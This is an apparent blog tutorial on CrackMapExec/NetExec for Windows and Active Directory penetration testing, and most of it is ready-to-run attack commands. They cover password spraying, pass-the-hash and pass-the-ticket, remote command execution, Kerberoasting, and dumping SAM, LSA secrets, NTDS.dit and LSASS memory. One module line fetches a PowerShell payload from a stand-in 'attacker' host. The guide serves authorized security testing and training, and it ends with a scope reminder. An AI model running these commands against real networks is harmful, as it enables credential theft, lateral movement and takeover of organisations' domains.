Ethical Hacking #crackmapexec#netexec#SMB

CrackMapExec: Network Pentesting Swiss Army Knife

Learn CrackMapExec (CME/NetExec) for SMB, WinRM, MSSQL, and LDAP pentesting — credential spraying, execution, and enumeration.

7 min read

CrackMapExec (CME), now continued as NetExec, is an indispensable post-exploitation tool for network pentesting, particularly in Windows and Active Directory environments. It automates credential testing across entire subnets, executes commands, dumps credentials, and enumerates AD information — all from the command line.

Installation

The project is now maintained as NetExec (nxc):

# Install NetExec (successor to CME)
pip3 install netexec

# Or from package managers
sudo apt install crackmapexec  # Kali (older CME version)

# From source (latest)
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec && pip3 install .

Both cme and nxc work the same way. This guide uses nxc.

Supported Protocols

NetExec supports: smb, winrm, mssql, ldap, rdp, ssh, ftp, vnc

nxc smb --help
nxc winrm --help

SMB Enumeration

Basic host discovery and SMB info

# Single host
nxc smb 192.168.1.10

# Subnet scan
nxc smb 192.168.1.0/24

# From host file
nxc smb hosts.txt

Output shows hostname, OS version, signing status, and domain name — all without credentials.

Check SMB signing

Hosts without SMB signing are vulnerable to relay attacks:

nxc smb 192.168.1.0/24 --gen-relay-list relay_targets.txt

List shares

nxc smb 192.168.1.10 -u user -p password --shares

Spider shares for interesting files

nxc smb 192.168.1.10 -u user -p password -M spider_plus

This module lists all readable files across all shares — great for finding credentials, config files, and sensitive documents.

Credential Testing and Spraying

Test a single credential

nxc smb 192.168.1.10 -u administrator -p 'Password123!'
# Pwned! = local admin
# + = valid but not admin

Credential spraying across a subnet

nxc smb 192.168.1.0/24 -u userlist.txt -p 'Winter2024!' --continue-on-success

Critical: add --no-bruteforce when testing multiple users against multiple passwords to avoid account lockout. Test one password at a time:

nxc smb 192.168.1.0/24 -u userlist.txt -p passwordlist.txt --no-bruteforce

Pass-the-Hash

nxc smb 192.168.1.0/24 -u administrator -H 'NTLMhash'

Pass-the-Ticket (Kerberos)

export KRB5CCNAME=/tmp/admin.ccache
nxc smb dc.domain.local -u admin -k --use-kcache

Command Execution

Once you have credentials with admin rights:

# Run a command
nxc smb 192.168.1.10 -u admin -p password -x "whoami"

# PowerShell command
nxc smb 192.168.1.10 -u admin -p password -X "Get-Process | Select Name"

# Execution method (default: wmiexec, alternatives: atexec, mmcexec)
nxc smb 192.168.1.10 -u admin -p password -x "whoami" --exec-method smbexec

Credential Dumping

SAM dump (local accounts)

nxc smb 192.168.1.10 -u admin -p password --sam

LSA secrets

nxc smb 192.168.1.10 -u admin -p password --lsa

NTDS.dit (domain controller)

nxc smb dc.domain.local -u domain_admin -p password --ntds

LSASS dump (requires local admin)

nxc smb 192.168.1.10 -u admin -p password -M lsassy

Lsassy module dumps LSASS memory and parses credentials automatically.

WinRM

# Test credentials
nxc winrm 192.168.1.10 -u user -p password

# Execute command
nxc winrm 192.168.1.10 -u user -p password -x "whoami"

LDAP and Active Directory Enumeration

# Domain info
nxc ldap dc.domain.local -u user -p password

# Get all users
nxc ldap dc.domain.local -u user -p password --users

# Get all groups
nxc ldap dc.domain.local -u user -p password --groups

# Find Kerberoastable accounts
nxc ldap dc.domain.local -u user -p password --kerberoasting output.txt

# Find ASREPRoastable accounts
nxc ldap dc.domain.local -u user -p password --asreproast output.txt

# Find users with unconstrained delegation
nxc ldap dc.domain.local -u user -p password --trusted-for-delegation

MSSQL

# Authenticate
nxc mssql 192.168.1.10 -u sa -p password

# Execute OS commands via xp_cmdshell
nxc mssql 192.168.1.10 -u sa -p password -x "whoami"

Modules

NetExec has an extensible module system:

# List all modules for SMB
nxc smb -L

# Useful modules
nxc smb target -u user -p pass -M mimikatz    # Run Mimikatz
nxc smb target -u user -p pass -M gpp_password # Find GPP passwords
nxc smb target -u user -p pass -M rdp --options "ACTION=enable"  # Enable RDP
nxc smb target -u user -p pass -M web_delivery --options "URL=http://attacker/shell.ps1"

Database and Output

NetExec stores all results in a local database (~/.nxc/nxc.db):

# View stored credentials
nxcdb

# Inside nxcdb
creds  # show all credentials
hosts  # show all hosts

NetExec is one of the fastest ways to map a Windows network, validate credential sets, and escalate access in an AD environment. Always use it within the scope of authorized testing only.

#penetration testing #SMB #netexec #crackmapexec